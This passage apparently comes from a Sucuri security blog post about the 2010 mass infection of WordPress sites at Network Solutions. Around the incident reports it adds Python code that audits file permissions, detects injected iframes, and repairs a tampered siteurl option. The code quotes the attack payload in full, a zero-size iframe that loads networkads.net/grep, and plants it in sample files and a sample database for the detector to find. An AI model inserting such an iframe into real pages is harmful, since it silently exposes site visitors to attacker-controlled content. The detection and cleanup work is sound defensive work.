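            mode = os.stat(full).st_mode
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if mode & (stat.S_IWOTH | stat.S_IWGRP):
                issues.append((rel, "group/world-writable upload directory"))
    return sorted(issues)

def _write(path, mode):
    with open(path, "w") as fh:
        fh.write("<?php // placeholder, no real credentials\n")
    os.chmod(path, mode)

def build_sample(base):
    """Constructed tree: one WordPress and one Joomla install with mixed permissions."""
    wp = os.path.join(base, "blog")
    joomla = os.path.join(base, "joomla")
    os.makedirs(os.path.join(wp, "wp-content", "uploads"))
    os.makedirs(os.path.join(joomla, "administrator"))
    _write(os.path.join(wp, "wp-config.php"), 0o644)                    # the 755/644 mistake
    _write(os.path.join(joomla, "configuration.php"), 0o640)            # group-readable only
    _write(os.path.join(joomla, "administrator", ".htpasswd"), 0o600)   # correct
    os.chmod(os.path.join(wp, "wp-content", "uploads"), 0o777)          # the Hostek finding

def sample_audit():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return audit(tmp)

if __name__ == "__main__":
    for path, issue in sample_audit():
        print(f"{path}: {issue}")
```

The group-readable case is deliberately a softer message than the world-readable one: the chmod 750 advice in this post is only as good as the group owning the file, which is the point the Hostek post makes when the group turns out to be nobody.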

**As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at dd@sucuri.net

Mass infection of WordPress blogs at Network Solutions

Since yesterday we have been seeing a large number of WordPress blogs (running the latest version, 2.9.2) getting infected with malware. None of them use the same plugins or the same themes. Some of them even have wp-admin access restricted to a few IPs and protected by an htpasswd password. The only thing they have in common is that they are all on shared hosting at Network Solutions.

Some of our clients spoke with Network Solutions and they confirmed that all their WordPress sites are having issues, but their servers are clean (are they?).

What is interesting about this attack is that it does not create or modify any files, so the usual security advice does not apply here. The only thing it does is modify your “siteurl” inside the “wp_options” table to point to http://networkads.net/grep/, breaking the site layout completely.

This is what it looks like in the database:

(2, 0, 'siteurl', '', 'yes'),

The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases.

Anyone else having this issue? If you are, let us know about it.

*To fix this issue, just revert your siteurl to its previous value. Log in to your control panel, go to manage database, and edit the siteurl value in the wp_options table.
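Both this post and the “Network Solutions hacked again” post above describe the same payload in two places: a zero-size iframe written into files (including WP-Super-Cache output) and the siteurl row of wp_options. The added example below (not from the posts) applies one set of markers to both: scan_files() reports files carrying the iframe, and check_and_repair_siteurl() inspects the siteurl option and resets it to a known-good URL only when it fails the check, which is the fix described above done programmatically. The sqlite3 table stands in for a MySQL wp_options table; the rows, file contents and the good URL are constructed samples, and the domains are the ones quoted in the posts.

```python
"""Detect the hidden-iframe injection in site files and in wp_options.siteurl.

Added example (not from the posts). The sqlite3 table stands in for the MySQL
wp_options table; rows, file contents and the good URL are constructed samples.
"""
import re
import sqlite3

# A legitimate siteurl is a bare URL: scheme, host, optional port and path, nothing else.
CLEAN_SITEURL_RE = re.compile(r"^https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s<>\"']*)?$")

# Markers of the injected payload: an iframe whose src is set on load and sized 0x0.
INJECTED_RE = re.compile(
    r"<\s*iframe[^>]*onload\s*=|this\.(?:height|width)\s*=\s*0|document\.write\s*\(",
    re.IGNORECASE,
)

def looks_injected(text):
    """True if text carries the iframe-injection markers."""
    return INJECTED_RE.search(text) is not None

def siteurl_is_clean(value):
    """A siteurl must be a plain URL and must not carry any payload marker."""
    return CLEAN_SITEURL_RE.match(value.strip()) is not None and not looks_injected(value)

def scan_files(files):
    """files: {path: contents}. Return the sorted paths whose contents look injected."""
    return sorted(path for path, body in files.items() if looks_injected(body))

def current_siteurl(conn, table="wp_options"):
    row = conn.execute(
        f"SELECT option_value FROM {table} WHERE option_name = 'siteurl'"
    ).fetchone()
    if row is None:
        raise LookupError("no siteurl row in " + table)
    return row[0]

def check_and_repair_siteurl(conn, good_url, table="wp_options"):
    """Return (was_tampered, old_value); reset siteurl to good_url only if it fails the check."""
    old = current_siteurl(conn, table)
    if siteurl_is_clean(old):
        return False, old
    conn.execute(
        f"UPDATE {table} SET option_value = ? WHERE option_name = 'siteurl'", (good_url,)
    )
    conn.commit()
    return True, old

# The injected value as quoted in the posts (networkads.net variant).
INJECTED_IFRAME = (
    "<iframe frameborder=\"0\" onload='if (!this.src){ this.src=\"http://networkads.net/grep/\"; "
    "this.height=0; this.width=0;}'></iframe>"
)

def build_sample_db(tampered=True):
    """Constructed wp_options table; with tampered=True the siteurl row holds the iframe."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_options (option_id INTEGER, blog_id INTEGER, "
        "option_name TEXT, option_value TEXT, autoload TEXT)"
    )
    siteurl = INJECTED_IFRAME if tampered else "http://example.com"
    conn.execute("INSERT INTO wp_options VALUES (2, 0, 'siteurl', ?, 'yes')", (siteurl,))
    conn.execute("INSERT INTO wp_options VALUES (3, 0, 'home', 'http://example.com', 'yes')")
    conn.commit()
    return conn

# Constructed file contents: one WP-Super-Cache page carrying the iframe, two clean files.
SAMPLE_FILES = {
    "wp-content/cache/supercache/example.com/index.html":
        "<html><body>Hello" + INJECTED_IFRAME.replace("networkads.net", "mainnetsoll.com") + "</body></html>",
    "index.html": "<html><body><p>clean page</p></body></html>",
    "wp-content/themes/walcan/footer.php": "<?php wp_footer(); ?></body></html>",
}

if __name__ == "__main__":
    print("injected files:", scan_files(SAMPLE_FILES))
    conn = build_sample_db()
    tampered, old = check_and_repair_siteurl(conn, "http://example.com")
    print("siteurl tampered:", tampered, "-> now", current_siteurl(conn))
```

Against a live site, pass a MySQL connection (the DB-API calls are the same) and feed scan_files() the contents of everything under wp-content/cache as well as the theme files, since Update 3 above found sites where the cache was the only place the iframe lived.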

**If you need help cleaning this up, send us an email dd@sucuri.net

Update 1: More Network Solutions users affected:

Same thing — some HTML inserted into the siteurl field in the wp_options table, and I can’t get to my login page. I hadn’t upgraded to 2.9.2 yet, and the site’s not using SimplePress forum. So it’s not just 2.9.2 that is affected, if that helps at all.

And here:

My site njnnetwork.com got hacked yesterday morning. After a series of non-productive tasks all day, Network Solutions admitted they have been hacked on many WordPress sites.

Here as well:

They changed my wp-options siteurl to be an iframe pointing to networkads.net/grep. The site was not loading correctly so I was able to find this in phpmyadmin. I have had a rash of hacks lately and talked to Network Solutions (my host). They tell me all of their wordpress sites are getting banged up, but their servers are clean.

And many more at the WordPress forums.